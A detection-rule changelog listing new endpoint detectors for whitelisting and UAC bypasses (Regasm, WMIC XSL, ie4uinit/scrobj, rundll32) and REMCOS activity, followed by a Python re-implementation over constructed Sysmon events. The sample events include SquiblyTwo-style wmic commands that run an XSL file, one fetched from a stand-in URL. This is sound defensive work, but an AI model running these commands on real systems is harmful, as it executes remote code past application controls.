==================================================

CREATED: WIN-REGASM-CLR-MODLOAD (#2137)

Description

This detector identifies Regasm (regasm.exe) loading the Common Language Runtime DLL (clr.dll) and wminet_utils.dll. Adversaries may use this technique to execute payloads that bypass application whitelisting.

ATT&CK Technique T1121

==================================================

CREATED: WIN-WMIC-XSL (#2182)

Description

This detector identifies instances of the Windows Management Instrumentation Command-line utility (wmic.exe) being given an XSL file to execute via the /format option. This technique is known as SquiblyTwo, an application whitelisting control bypass.

ATT&CK Technique T1220

==================================================

CREATED: WIN-IE4UINIT-MODLOAD-SCROBJ (#2212)

Description

This detector identifies IE4UINIT (ie4uinit.exe) loading the Scrobj DLL (scrobj.dll). Adversaries can abuse the default settings of IE4UINIT to bypass UAC and launch malicious code.

ATT&CK Technique T1088

==================================================

CREATED: PRODUCT-NIRSOFT-PRODUKEY (#2224)

Description

This detector identifies executions of programs that are part of the NirSoft ProduKey product. These programs are classified as riskware in the License Bypass category: a third-party application for bypassing software license restrictions.

==================================================

CREATED: WIN-REMCOS-POSSIBLE-FILEMOD (#2229)

Description

This detector identifies the creation or modification of files and directories commonly seen with REMCOS malware infections.

ATT&CK Technique T1056

==================================================

CREATED: WIN-RUNDLL-NO-CLI-CHILDPROC (#2233)

Description

This detector identifies instances of the Windows rundll32.exe process executing without command-line arguments and then spawning a child process. Legitimate use of rundll32.exe almost always names a DLL and entry point on the command line, so an argument-less instance that goes on to create children is suspicious.

ATT&CK Technique T1085
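
The following is an added example, not the vendor's detector logic, showing how four of the detectors described on this page (WIN-WMIC-XSL, WIN-RUNDLL-NO-CLI-CHILDPROC, WIN-IE4UINIT-MODLOAD-SCROBJ and WIN-REGASM-CLR-MODLOAD) could be expressed as rules over Sysmon-style process-creation and image-load events. The event schema, field names and sample events are constructed for the example; the only extension beyond the page's wording is that the WMIC rule also flags a /format value that is an http(s) URL, which is how the public SquiblyTwo technique is commonly invoked.

```python
"""Toy re-implementation of four detector descriptions over constructed
Sysmon-like events (event_id 1 = process create, 7 = image load).
Assumed schema, not the vendor's own logic."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int                  # 1 = process create, 7 = image load
    pid: int
    image: str                     # full path of the acting process
    command_line: str = ""
    parent_image: str = ""
    parent_command_line: str = ""
    image_loaded: str = ""         # only populated for event_id 7


def basename(path: str) -> str:
    """Lower-cased final path component; tolerates / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_no_arguments(command_line: str) -> bool:
    """True when the command line is only the executable path (quoted or not).
    An unquoted path containing spaces is treated as having arguments, which is
    acceptable here because rundll32.exe lives in System32."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return end != -1 and s[end + 1:].strip() == ""
    return len(s.split()) == 1


FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)


def is_wmic_xsl(ev: Event) -> bool:
    """WIN-WMIC-XSL: wmic.exe given an .xsl file (or remote URL) via /format.
    Built-in formats such as /format:list or /format:csv are not flagged."""
    if ev.event_id != 1 or basename(ev.image) != "wmic.exe":
        return False
    m = FORMAT_RE.search(ev.command_line)
    if not m:
        return False
    value = m.group(1).lower()
    return value.endswith(".xsl") or value.startswith(("http://", "https://"))


def is_rundll32_no_cli_child(ev: Event) -> bool:
    """WIN-RUNDLL-NO-CLI-CHILDPROC: child whose parent is an argument-less rundll32.exe."""
    return (ev.event_id == 1
            and basename(ev.parent_image) == "rundll32.exe"
            and has_no_arguments(ev.parent_command_line))


def is_ie4uinit_scrobj(ev: Event) -> bool:
    """WIN-IE4UINIT-MODLOAD-SCROBJ: ie4uinit.exe loading scrobj.dll."""
    return (ev.event_id == 7
            and basename(ev.image) == "ie4uinit.exe"
            and basename(ev.image_loaded) == "scrobj.dll")


class RegasmClrDetector:
    """WIN-REGASM-CLR-MODLOAD: stateful, fires once per regasm.exe process
    after it has loaded both clr.dll and wminet_utils.dll (page says 'and')."""
    REQUIRED = {"clr.dll", "wminet_utils.dll"}

    def __init__(self) -> None:
        self.seen = defaultdict(set)   # pid -> set of module basenames loaded
        self.alerted = set()

    def check(self, ev: Event) -> bool:
        if ev.event_id != 7 or basename(ev.image) != "regasm.exe":
            return False
        self.seen[ev.pid].add(basename(ev.image_loaded))
        if self.REQUIRED <= self.seen[ev.pid] and ev.pid not in self.alerted:
            self.alerted.add(ev.pid)
            return True
        return False


def run_detectors(events):
    """Return (detector_name, pid) tuples in the order alerts fire."""
    regasm = RegasmClrDetector()
    alerts = []
    for ev in events:
        if is_wmic_xsl(ev):
            alerts.append(("WIN-WMIC-XSL", ev.pid))
        if is_rundll32_no_cli_child(ev):
            alerts.append(("WIN-RUNDLL-NO-CLI-CHILDPROC", ev.pid))
        if is_ie4uinit_scrobj(ev):
            alerts.append(("WIN-IE4UINIT-MODLOAD-SCROBJ", ev.pid))
        if regasm.check(ev):
            alerts.append(("WIN-REGASM-CLR-MODLOAD", ev.pid))
    return alerts


# Constructed sample telemetry (not real captures). Paths abbreviated with "..." are placeholders.
RUNDLL = r"C:\Windows\System32\rundll32.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
SAMPLE_EVENTS = [
    Event(1, 100, r"C:\Windows\System32\wbem\WMIC.exe", "wmic os get /format:list"),       # benign
    Event(1, 101, r"C:\Windows\System32\wbem\WMIC.exe", r'wmic os get /format:"C:\Users\Public\evil.xsl"'),
    Event(1, 102, r"C:\Windows\System32\wbem\WMIC.exe", 'wmic process list /format:"https://example.invalid/a.xsl"'),
    Event(1, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", RUNDLL, "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
    Event(1, 201, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", RUNDLL, '"' + RUNDLL + '"'),
    Event(7, 300, r"C:\Windows\System32\ie4uinit.exe", image_loaded=r"C:\Windows\System32\scrobj.dll"),
    Event(7, 400, REGASM, image_loaded=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),  # clr.dll only
    Event(7, 401, REGASM, image_loaded=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),
    Event(7, 401, REGASM, image_loaded=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\wminet_utils.dll"),
]

if __name__ == "__main__":
    for name, pid in run_detectors(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

Running the block prints one alert for each of pids 101, 102, 201, 300 and 401; pids 100, 200 and 400 stay quiet because a built-in wmic format, a rundll32 with a real DLL argument, and a regasm that loaded clr.dll without wminet_utils.dll are all expected behaviour.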
